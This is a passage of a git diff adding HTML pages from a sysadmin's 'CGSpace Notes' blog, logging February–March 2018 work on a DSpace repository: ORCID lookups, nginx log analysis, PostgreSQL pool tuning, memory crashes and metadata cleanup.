+<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml ORCID_ID_CIAT_IITA_IWMI.csv | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; 2018-02-20-combined.txt
+</code></pre><ul>
+<li>I updated the <code>resolve-orcids.py</code> to use the &ldquo;credit-name&rdquo; if it exists in a profile, falling back to &ldquo;given-names&rdquo; + &ldquo;family-name&rdquo;</li>
+<li>Also, I added color coded output to the debug messages and added a &ldquo;quiet&rdquo; mode that supresses the normal behavior of printing results to the screen</li>
+<li>I&rsquo;m using this as the test input for <code>resolve-orcids.py</code>:</li>
+</ul>
+<pre tabindex="0"><code>$ cat orcid-test-values.txt 
+# valid identifier with &#39;given-names&#39; and &#39;family-name&#39;
+0000-0001-5019-1368
+
+# duplicate identifier
+0000-0001-5019-1368 
+
+# invalid identifier
+0000-0001-9634-19580
+
+# has a &#39;credit-name&#39; value we should prefer
+0000-0002-1735-7458
+
+# has a blank &#39;credit-name&#39; value
+0000-0001-5199-5528
+
+# has a null &#39;name&#39; object
+0000-0002-1300-3636
+
+# has a null &#39;family-name&#39; value
+0000-0001-9634-1958
+
+# missing ORCID identifier
+0000-0003-4221-3214
+</code></pre><ul>
+<li>Help debug issues with Altmetric badges again, it looks like Altmetric is all kinds of fucked up</li>
+<li>Last week I pointed out that they were tracking Handles from our test server</li>
+<li>Now, their API is responding with content that is marked as content-type JSON but is not valid JSON</li>
+<li>For example, this item: <a href="https://cgspace.cgiar.org/handle/10568/83320">https://cgspace.cgiar.org/handle/10568/83320</a></li>
+<li>The Altmetric JavaScript builds the following API call: <a href="https://api.altmetric.com/v1/handle/10568/83320?callback=_altmetric.embed_callback&amp;domain=cgspace.cgiar.org&amp;key=3c130976ca2b8f2e88f8377633751ba1&amp;cache_until=13-20">https://api.altmetric.com/v1/handle/10568/83320?callback=_altmetric.embed_callback&amp;domain=cgspace.cgiar.org&amp;key=3c130976ca2b8f2e88f8377633751ba1&amp;cache_until=13-20</a></li>
+<li>The response body is <em>not</em> JSON</li>
+<li>To contrast, the following bare API call without query parameters is valid JSON: <a href="https://api.altmetric.com/v1/handle/10568/83320">https://api.altmetric.com/v1/handle/10568/83320</a></li>
+<li>I told them that it&rsquo;s their JavaScript that is fucked up</li>
+<li>Remove CPWF project number and Humidtropics subject from submission form (<a href="https://github.com/alanorth/DSpace/pull/3">#3</a>)</li>
+<li>I accidentally merged it into my own repository, oops</li>
+</ul>
+<h2 id="2018-02-22">2018-02-22</h2>
+<ul>
+<li>CGSpace was apparently down today around 13:00 server time and I didn&rsquo;t get any emails on my phone, but saw them later on the computer</li>
+<li>It looks like Sisay restarted Tomcat because I was offline</li>
+<li>There was absolutely nothing interesting going on at 13:00 on the server, WTF?</li>
+</ul>
+<pre tabindex="0"><code># cat /var/log/nginx/*.log | grep -E &#34;22/Feb/2018:13&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     55 192.99.39.235
+     60 207.46.13.26
+     62 40.77.167.38
+     65 207.46.13.23
+    103 41.57.108.208
+    120 104.196.152.243
+    133 104.154.216.0
+    145 68.180.228.117
+    159 54.92.197.82
+    231 5.9.6.51
+</code></pre><ul>
+<li>Otherwise there was pretty normal traffic the rest of the day:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;22/Feb/2018&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+    839 216.244.66.245
+   1074 68.180.228.117
+   1114 157.55.39.100
+   1162 207.46.13.26
+   1178 207.46.13.23
+   2749 104.196.152.243
+   3109 50.116.102.77
+   4199 70.32.83.92
+   5208 5.9.6.51
+   8686 45.5.184.196
+</code></pre><ul>
+<li>So I don&rsquo;t see any definite cause for this crash, I see a shit ton of abandoned PostgreSQL connections today around 1PM!</li>
+</ul>
+<pre tabindex="0"><code># grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; /var/log/tomcat7/catalina.out
+729
+# grep &#39;Feb 22, 2018 1&#39; /var/log/tomcat7/catalina.out | grep -c &#39;org.apache.tomcat.jdbc.pool.ConnectionPool abandon&#39; 
+519
+</code></pre><ul>
+<li>I think the <code>removeAbandonedTimeout</code> might still be too low (I increased it from 60 to 90 seconds last week)</li>
+<li>Abandoned connections is not a cause but a symptom, though perhaps something more like a few minutes is better?</li>
+<li>Also, while looking at the logs I see some new bot:</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.4.2661.102 Safari/537.36; 360Spider
+</code></pre><ul>
+<li>It seems to re-use its user agent but makes tons of useless requests and I wonder if I should add &ldquo;.<em>spider.</em>&rdquo; to the Tomcat Crawler Session Manager valve?</li>
+</ul>
+<h2 id="2018-02-23">2018-02-23</h2>
+<ul>
+<li>Atmire got back to us with a quote about their DSpace 5.8 upgrade</li>
+</ul>
+<h2 id="2018-02-25">2018-02-25</h2>
+<ul>
+<li>A few days ago Abenet sent me the list of ORCID iDs from CCAFS</li>
+<li>We currently have 988 unique identifiers:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l          
+988
+</code></pre><ul>
+<li>After adding the ones from CCAFS we now have 1004:</li>
+</ul>
+<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/ccafs | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq | wc -l
+1004
+</code></pre><ul>
+<li>I will add them to DSpace Test but Abenet says she&rsquo;s still waiting to set us ILRI&rsquo;s list</li>
+<li>I will tell her that we should proceed on sharing our work on DSpace Test with the partners this week anyways and we can update the list later</li>
+<li>While regenerating the names for these ORCID identifiers I saw <a href="https://pub.orcid.org/v2.1/0000-0002-2614-426X/person">one that has a weird value for its names</a>:</li>
+</ul>
+<pre tabindex="0"><code>Looking up the names associated with ORCID iD: 0000-0002-2614-426X
+Given Names Deactivated Family Name Deactivated: 0000-0002-2614-426X
+</code></pre><ul>
+<li>I don&rsquo;t know if the user accidentally entered this as their name or if that&rsquo;s how ORCID behaves when the name is private?</li>
+<li>I will remove that one from our list for now</li>
+<li>Remove Dryland Systems subject from submission form because that CRP closed two years ago (<a href="https://github.com/ilri/DSpace/pull/355">#355</a>)</li>
+<li>Run all system updates on DSpace Test</li>
+<li>Email ICT to ask how to proceed with the OCS proforma issue for the new DSpace Test server on Linode</li>
+<li>Thinking about how to preserve ORCID identifiers attached to existing items in CGSpace</li>
+<li>We have over 60,000 unique author + authority combinations on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select count(distinct (text_value, authority)) from metadatavalue where resource_type_id=2 and metadata_field_id=3;
+ count 
+-------
+ 62464
+(1 row)
+</code></pre><ul>
+<li>I know from earlier this month that there are only 624 unique ORCID identifiers in the Solr authority core, so it&rsquo;s way easier to just fetch the unique ORCID iDs from Solr and then go back to PostgreSQL and do the metadata mapping that way</li>
+<li>The query in Solr would simply be <code>orcid_id:*</code></li>
+<li>Assuming I know that authority record with <code>id:d7ef744b-bbd4-4171-b449-00e37e1b776f</code>, then I could query PostgreSQL for all metadata records using that authority:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select * from metadatavalue where resource_type_id=2 and authority=&#39;d7ef744b-bbd4-4171-b449-00e37e1b776f&#39;;
+ metadata_value_id | resource_id | metadata_field_id |        text_value         | text_lang | place |              authority               | confidence | resource_type_id 
+-------------------+-------------+-------------------+---------------------------+-----------+-------+--------------------------------------+------------+------------------
+           2726830 |       77710 |                 3 | Rodríguez Chalarca, Jairo |           |     2 | d7ef744b-bbd4-4171-b449-00e37e1b776f |        600 |                2
+(1 row)
+</code></pre><ul>
+<li>Then I suppose I can use the <code>resource_id</code> to identify the item?</li>
+<li>Actually, <code>resource_id</code> is the same id we use in CSV, so I could simply build something like this for a metadata import!</li>
+</ul>
+<pre tabindex="0"><code>id,cg.creator.id
+93848,Alan S. Orth: 0000-0002-1735-7458||Peter G. Ballantyne: 0000-0001-9346-2893
+</code></pre><ul>
+<li>I just discovered that <a href="https://requests-cache.readthedocs.io">requests-cache</a> can transparently cache HTTP requests</li>
+<li>Running <code>resolve-orcids.py</code> with my test input takes 10.5 seconds the first time, and then 3.0 seconds the second time!</li>
+</ul>
+<pre tabindex="0"><code>$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
+Ali Ramadhan: 0000-0001-5019-1368
+Alan S. Orth: 0000-0002-1735-7458
+Ibrahim Mohammed: 0000-0001-5199-5528
+Nor Azwadi: 0000-0001-9634-1958
+./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names  0.32s user 0.07s system 3% cpu 10.530 total
+$ time ./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names
+Ali Ramadhan: 0000-0001-5019-1368
+Alan S. Orth: 0000-0002-1735-7458
+Ibrahim Mohammed: 0000-0001-5199-5528
+Nor Azwadi: 0000-0001-9634-1958
+./resolve-orcids.py -i orcid-test-values.txt -o /tmp/orcid-names  0.23s user 0.05s system 8% cpu 3.046 total
+</code></pre><h2 id="2018-02-26">2018-02-26</h2>
+<ul>
+<li>Peter is having problems with &ldquo;Socket closed&rdquo; on his submissions page again</li>
+<li>He says his personal account loads much faster than his CGIAR account, which could be because the CGIAR account has potentially thousands of submissions over the last few years</li>
+<li>I don&rsquo;t know why it would take so long, but this logic kinda makes sense</li>
+<li>I think I should increase the <code>removeAbandonedTimeout</code> from 90 to something like 180 and continue observing</li>
+<li>I also reduced the timeout for the API pool back to 60 because those interfaces are only used by bots</li>
+</ul>
+<h2 id="2018-02-27">2018-02-27</h2>
+<ul>
+<li>Peter is still having problems with &ldquo;Socket closed&rdquo; on his submissions page</li>
+<li>I have disabled <code>removeAbandoned</code> for now because that&rsquo;s the only thing I changed in the last few weeks since he started having issues</li>
+<li>I think the real line of logic to follow here is why the submissions page is so slow for him (presumably because of loading all his submissions?)</li>
+<li>I need to see which SQL queries are run during that time</li>
+<li>And only a few hours after I disabled the <code>removeAbandoned</code> thing CGSpace went down and lo and behold, there were 264 connections, most of which were idle:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
+      5 dspaceApi
+    279 dspaceWeb
+$ psql -c &#39;select * from pg_stat_activity&#39; | grep dspaceWeb | grep -c &#34;idle in transaction&#34;
+218
+</code></pre><ul>
+<li>So I&rsquo;m re-enabling the <code>removeAbandoned</code> setting</li>
+<li>I grabbed a snapshot of the active connections in <code>pg_stat_activity</code> for all queries running longer than 2 minutes:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (SELECT now() - query_start as &#34;runtime&#34;, application_name, usename, datname, waiting, state, query
+  FROM  pg_stat_activity
+  WHERE now() - query_start &gt; &#39;2 minutes&#39;::interval
+ ORDER BY runtime DESC) to /tmp/2018-02-27-postgresql.txt
+COPY 263
+</code></pre><ul>
+<li>100 of these idle in transaction connections are the following query:</li>
+</ul>
+<pre tabindex="0"><code>SELECT * FROM resourcepolicy WHERE resource_type_id= $1 AND resource_id= $2 AND action_id= $3
+</code></pre><ul>
+<li>&hellip; but according to the <a href="https://www.postgresql.org/docs/9.5/static/view-pg-locks.html">pg_locks documentation</a> I should have done this to correlate the locks with the activity:</li>
+</ul>
+<pre tabindex="0"><code>SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;
+</code></pre><ul>
+<li>Tom Desair from Atmire shared some extra JDBC pool parameters that might be useful on my thread on the dspace-tech mailing list:
+<ul>
+<li>abandonWhenPercentageFull: Only start cleaning up abandoned connections if the pool is used for more than X %.</li>
+<li>jdbcInterceptors=&lsquo;ResetAbandonedTimer&rsquo;: Make sure the &ldquo;abondoned&rdquo; timer is reset every time there is activity on a connection</li>
+</ul>
+</li>
+<li>I will try with <code>abandonWhenPercentageFull='50'</code></li>
+<li>Also there are some indexes proposed in <a href="https://jira.duraspace.org/browse/DS-3636">DS-3636</a> that he urged me to try</li>
+<li>Finally finished the <a href="https://gist.github.com/alanorth/6d7489b50f06a6a1f04ae1c8b899cb6e">orcid-authority-to-item.py</a> script!</li>
+<li>It successfully mapped 2600 ORCID identifiers to items in my tests</li>
+<li>I will run it on DSpace Test</li>
+</ul>
+<h2 id="2018-02-28">2018-02-28</h2>
+<ul>
+<li>CGSpace crashed today, the first HTTP 499 in nginx&rsquo;s access.log was around 09:12</li>
+<li>There&rsquo;s nothing interesting going on in nginx&rsquo;s logs around that time:</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;28/Feb/2018:09:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
+     65 197.210.168.174
+     74 213.55.99.121
+     74 66.249.66.90
+     86 41.204.190.40
+    102 130.225.98.207
+    108 192.0.89.192
+    112 157.55.39.218
+    129 207.46.13.21
+    131 207.46.13.115
+    135 207.46.13.101
+</code></pre><ul>
+<li>Looking in dspace.log-2018-02-28 I see this, though:</li>
+</ul>
+<pre tabindex="0"><code>2018-02-28 09:19:29,692 ERROR org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter @ Serious Error Occurred Processing Request!
+org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.lang.OutOfMemoryError: Java heap space
+</code></pre><ul>
+<li>Memory issues seem to be common this month:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -c &#39;nested exception is java.lang.OutOfMemoryError: Java heap space&#39; dspace.log.2018-02-* 
+dspace.log.2018-02-01:0
+dspace.log.2018-02-02:0
+dspace.log.2018-02-03:0
+dspace.log.2018-02-04:0
+dspace.log.2018-02-05:0
+dspace.log.2018-02-06:0
+dspace.log.2018-02-07:0
+dspace.log.2018-02-08:0
+dspace.log.2018-02-09:0
+dspace.log.2018-02-10:0
+dspace.log.2018-02-11:0
+dspace.log.2018-02-12:0
+dspace.log.2018-02-13:0
+dspace.log.2018-02-14:0
+dspace.log.2018-02-15:10
+dspace.log.2018-02-16:0
+dspace.log.2018-02-17:0
+dspace.log.2018-02-18:0
+dspace.log.2018-02-19:0
+dspace.log.2018-02-20:0
+dspace.log.2018-02-21:0
+dspace.log.2018-02-22:0
+dspace.log.2018-02-23:0
+dspace.log.2018-02-24:0
+dspace.log.2018-02-25:0
+dspace.log.2018-02-26:0
+dspace.log.2018-02-27:6
+dspace.log.2018-02-28:1
+</code></pre><ul>
+<li>Top ten users by session during the first twenty minutes of 9AM:</li>
+</ul>
+<pre tabindex="0"><code>$ grep -E &#39;2018-02-28 09:(0|1)&#39; dspace.log.2018-02-28 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq -c | sort -n | tail -n 10
+     18 session_id=F2DFF64D3D707CD66AE3A873CEC80C49
+     19 session_id=92E61C64A79F0812BE62A3882DA8F4BA
+     21 session_id=57417F5CB2F9E3871E609CEEBF4E001F
+     25 session_id=C3CD265AB7AA51A49606C57C069A902A
+     26 session_id=E395549F081BA3D7A80F174AE6528750
+     26 session_id=FEE38CF9760E787754E4480069F11CEC
+     33 session_id=C45C2359AE5CD115FABE997179E35257
+     38 session_id=1E9834E918A550C5CD480076BC1B73A4
+     40 session_id=8100883DAD00666A655AE8EC571C95AE
+     66 session_id=01D9932D6E85E90C2BA9FF5563A76D03
+</code></pre><ul>
+<li>According to the log 01D9932D6E85E90C2BA9FF5563A76D03 is an ILRI editor, doing lots of updating and editing of items</li>
+<li>8100883DAD00666A655AE8EC571C95AE is some Indian IP address</li>
+<li>1E9834E918A550C5CD480076BC1B73A4 looks to be a session shared by the bots</li>
+<li>So maybe it was due to the editor&rsquo;s uploading of files, perhaps something that was too big or?</li>
+<li>I think I&rsquo;ll increase the JVM heap size on CGSpace from 6144m to 8192m because I&rsquo;m sick of this random crashing shit and the server has memory and I&rsquo;d rather eliminate this so I can get back to solving PostgreSQL issues and doing other real work</li>
+<li>Run the few corrections from earlier this month for sponsor on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>cgspace=# update metadatavalue set text_value=&#39;United States Agency for International Development&#39; where resource_type_id=2 and metadata_field_id=29 and text_value like &#39;%U.S. Agency for International Development%&#39;;
+UPDATE 3
+</code></pre><ul>
+<li>I finally got a CGIAR account so I logged into CGSpace with it and tried to delete my old unfinished submissions (22 of them)</li>
+<li>Eventually it succeeded, but it took about five minutes and I noticed LOTS of locks happening with this query:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \copy (SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid) to /tmp/locks-aorth.txt;
+</code></pre><ul>
+<li>I took a few snapshots during the process and noticed 500, 800, and even 2000 locks at certain times during the process</li>
+<li>Afterwards I looked a few times and saw only 150 or 200 locks</li>
+<li>On the test server, with the <a href="https://jira.duraspace.org/browse/DS-3636">PostgreSQL indexes from DS-3636</a> applied, it finished instantly</li>
+<li>Run system updates on DSpace Test and reboot the server</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2018-03/index.html b/docs/2018-03/index.html
new file mode 100644
index 000000000..bbeaa3e10
--- /dev/null
+++ b/docs/2018-03/index.html
@@ -0,0 +1,639 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="March, 2018" />
+<meta property="og:description" content="2018-03-02
+
+Export a CSV of the IITA community metadata for Martin Mueller
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2018-03/" />
+<meta property="article:published_time" content="2018-03-02T16:07:54+02:00" />
+<meta property="article:modified_time" content="2019-10-28T13:39:25+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="March, 2018"/>
+<meta name="twitter:description" content="2018-03-02
+
+Export a CSV of the IITA community metadata for Martin Mueller
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "March, 2018",
+  "url": "https://alanorth.github.io/cgspace-notes/2018-03/",
+  "wordCount": "2960",
+  "datePublished": "2018-03-02T16:07:54+02:00",
+  "dateModified": "2019-10-28T13:39:25+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2018-03/">
+
+    <title>March, 2018 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2018-03/">March, 2018</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2018-03-02T16:07:54+02:00">Fri Mar 02, 2018</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2018-03-02">2018-03-02</h2>
+<ul>
+<li>Export a CSV of the IITA community metadata for Martin Mueller</li>
+</ul>
+<h2 id="2018-03-06">2018-03-06</h2>
+<ul>
+<li>Add three new CCAFS project tags to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/357">#357</a>)</li>
+<li>Andrea from Macaroni Bros had sent me an email that CCAFS needs them</li>
+<li>Give Udana more feedback on his WLE records from last month</li>
+<li>There were some records using a non-breaking space in their AGROVOC subject field</li>
+<li>I checked and tested some author corrections from Peter from last week, and then applied them on CGSpace</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Correct-309-authors-2018-03-06.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3      
+$ ./delete-metadata-values.py -i Delete-3-Authors-2018-03-06.csv -db dspace -u dspace-p &#39;fuuu&#39; -f dc.contributor.author -m 3
+</code></pre><ul>
+<li>This time there were no errors in whitespace but I did have to correct one incorrectly encoded accent character</li>
+<li>Add new CRP subject &ldquo;GRAIN LEGUMES AND DRYLAND CEREALS&rdquo; to <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/358">#358</a>)</li>
+<li>Merge the ORCID integration stuff in to <code>5_x-prod</code> for deployment on CGSpace soon (<a href="https://github.com/ilri/DSpace/pull/359">#359</a>)</li>
+<li>Deploy ORCID changes on CGSpace (linode18), run all system updates, and reboot the server</li>
+<li>Run all system updates on DSpace Test and reboot server</li>
+<li>I ran the <a href="https://gist.github.com/alanorth/24d8081a5dc25e2a4e27e548e7e2389c">orcid-authority-to-item.py</a> script on CGSpace and mapped 2,864 ORCID identifiers from Solr to item metadata</li>
+</ul>
+<pre tabindex="0"><code>$ ./orcid-authority-to-item.py -db dspace -u dspace -p &#39;fuuu&#39; -s http://localhost:8081/solr -d
+</code></pre><ul>
+<li>I ran the DSpace cleanup script on CGSpace and it threw an error (as always):</li>
+</ul>
+<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
+  Detail: Key (bitstream_id)=(150659) is still referenced from table &#34;bundle&#34;.
+</code></pre><ul>
+<li>The solution is, as always:</li>
+</ul>
+<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (150659);&#39;
+UPDATE 1
+</code></pre><ul>
+<li>Apply the proposed PostgreSQL indexes from DS-3636 (pull request <a href="https://github.com/DSpace/DSpace/pull/1791/">#1791</a> on CGSpace (linode18)</li>
+</ul>
+<h2 id="2018-03-07">2018-03-07</h2>
+<ul>
+<li>Add CIAT author Mauricio Efren Sotelo Cabrera to controlled vocabulary for ORCID identifiers (<a href="https://github.com/ilri/DSpace/pull/360">#360</a>)</li>
+<li>Help Sisay proof 200 IITA records on DSpace Test</li>
+<li>Finally import Udana&rsquo;s 24 items to <a href="https://cgspace.cgiar.org/handle/10568/36185">IWMI Journal Articles</a> on CGSpace</li>
+<li>Skype with James Stapleton to discuss CGSpace, ILRI website, CKM staff issues, etc</li>
+</ul>
+<h2 id="2018-03-08">2018-03-08</h2>
+<ul>
+<li>Looking at a CSV dump of the CIAT community I see there are tons of stupid text languages people add for their metadata</li>
+<li>This makes the CSV have tons of columns, for example <code>dc.title</code>, <code>dc.title[]</code>, <code>dc.title[en]</code>, <code>dc.title[eng]</code>, <code>dc.title[en_US]</code> and so on!</li>
+<li>I think I can fix — or at least normalize — them in the database:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# select distinct text_lang from metadatavalue where resource_type_id=2;
+ text_lang 
+-----------
+ 
+ ethnob
+ en
+ spa
+ EN
+ En
+ en_
+ en_US
+ E.
+ 
+ EN_US
+ en_U
+ eng
+ fr
+ es_ES
+ es
+(16 rows)
+
+dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;en&#39;,&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
+UPDATE 122227
+dspacetest=# select distinct text_lang from metadatavalue where resource_type_id=2;
+ text_lang
+-----------
+
+ ethnob
+ en_US
+ spa
+ E.
+
+ fr
+ es_ES
+ es
+(9 rows)
+</code></pre><ul>
+<li>On second inspection it looks like <code>dc.description.provenance</code> fields use the text_lang &ldquo;en&rdquo; so that&rsquo;s probably why there are over 100,000 fields changed&hellip;</li>
+<li>If I skip that, there are about 2,000, which seems more reasonably like the amount of fields users have edited manually, or fucked up during CSV import, etc:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# update metadatavalue set text_lang=&#39;en_US&#39; where resource_type_id=2 and text_lang in (&#39;EN&#39;,&#39;En&#39;,&#39;en_&#39;,&#39;EN_US&#39;,&#39;en_U&#39;,&#39;eng&#39;);
+UPDATE 2309
+</code></pre><ul>
+<li>I will apply this on CGSpace right now</li>
+<li>In other news, I was playing with adding ORCID identifiers to a dump of CIAT&rsquo;s community via CSV in OpenRefine</li>
+<li>Using a series of filters, flags, and GREL expressions to isolate items for a certain author, I figured out how to add ORCID identifiers to the <code>cg.creator.id</code> field</li>
+<li>For example, a GREL expression in a custom text facet to get all items with <code>dc.contributor.author[en_US]</code> of a certain author with several name variations (this is how you use a logical OR in OpenRefine):</li>
+</ul>
+<pre tabindex="0"><code>or(value.contains(&#39;Ceballos, Hern&#39;), value.contains(&#39;Hernández Ceballos&#39;))
+</code></pre><ul>
+<li>Then you can flag or star matching items and then use a conditional to either set the value directly or add it to an existing value:</li>
+</ul>
+<pre tabindex="0"><code>if(isBlank(value), &#34;Hernan Ceballos: 0000-0002-8744-7918&#34;, value + &#34;||Hernan Ceballos: 0000-0002-8744-7918&#34;)
+</code></pre><ul>
+<li>One thing that bothers me is that this won&rsquo;t honor author order</li>
+<li>It might be better to do batches of these in PostgreSQL with a script that takes the <code>place</code> column of an author into account when setting the <code>cg.creator.id</code></li>
+<li>I wrote a Python script to read the author names and ORCID identifiers from CSV and create matching <code>cg.creator.id</code> fields: <a href="https://gist.github.com/alanorth/a49d85cd9c5dea89cddbe809813a7050">add-orcid-identifiers-csv.py </a></li>
+<li>The CSV should have two columns: author name and ORCID identifier:</li>
+</ul>
+<pre tabindex="0"><code>dc.contributor.author,cg.creator.id
+&#34;Orth, Alan&#34;,Alan S. Orth: 0000-0002-1735-7458
+&#34;Orth, A.&#34;,Alan S. Orth: 0000-0002-1735-7458
+</code></pre><ul>
+<li>I didn&rsquo;t integrate the ORCID API lookup for author names in this script for now because I was only interested in &ldquo;tagging&rdquo; old items for a few given authors</li>
+<li>I added ORCID identifers for 187 items by CIAT&rsquo;s Hernan Ceballos, because that is what Elizabeth was trying to do manually!</li>
+<li>Also, I decided to add ORCID identifiers for all records from Peter, Abenet, and Sisay as well</li>
+</ul>
+<h2 id="2018-03-09">2018-03-09</h2>
+<ul>
+<li>Give James Stapleton input on Sisay&rsquo;s KRAs</li>
+<li>Create a pull request to disable ORCID authority integration for <code>dc.contributor.author</code> in the submission forms and XMLUI display (<a href="https://github.com/ilri/DSpace/pull/363">#363</a>)</li>
+</ul>
+<h2 id="2018-03-11">2018-03-11</h2>
+<ul>
+<li>Peter also wrote to say he is having issues with the Atmire Listings and Reports module</li>
